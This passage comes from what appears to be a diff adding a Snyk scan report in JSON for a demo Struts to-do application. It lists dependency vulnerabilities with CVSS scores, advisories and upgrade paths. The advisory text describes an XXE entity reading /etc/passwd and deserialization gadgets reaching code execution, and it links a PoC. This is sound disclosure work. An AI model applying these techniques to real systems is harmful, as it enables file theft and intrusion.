false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + 
"modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + 
"severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2", + 
"severityWithCritical": "high" + } + ], + "upgrade": { + "org.apache.logging.log4j:log4j-core@2.7": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.13.2", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524" + ] + }, + "org.apache.struts:struts2-core@2.3.20": { + "upgradeTo": "org.apache.struts:struts2-core@6.1.2", + "upgrades": [ + "commons-fileupload:commons-fileupload@1.3.1", + "commons-io:commons-io@2.2", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1", + "commons-fileupload:commons-fileupload@1.3.1", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "ognl:ognl@3.0.6", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + 
"org.apache.struts.xwork:xwork-core@2.3.20" + ], + "vulns": [ + "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "SNYK-JAVA-COMMONSIO-1277109", + "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "SNYK-JAVA-ORGFREEMARKER-1076795", + "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "SNYK-JAVA-OGNL-30474", + "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418" + ] + }, + "org.springframework:spring-web@3.2.6.RELEASE": { + "upgradeTo": "org.springframework:spring-web@5.3.34", + "upgrades": [ + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", 
+ "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "vulns": [ + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331" + ] + }, + "org.zeroturnaround:zt-zip@1.12": { + "upgradeTo": "org.zeroturnaround:zt-zip@1.13", + "upgrades": [ + "org.zeroturnaround:zt-zip@1.12" + ], + "vulns": [ + "SNYK-JAVA-ORGZEROTURNAROUND-31681" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + 
"moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. 
Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "filtered": { + 
"ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:20.019Z", + "expires": "2024-08-08T12:49:19.816Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. 
We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to 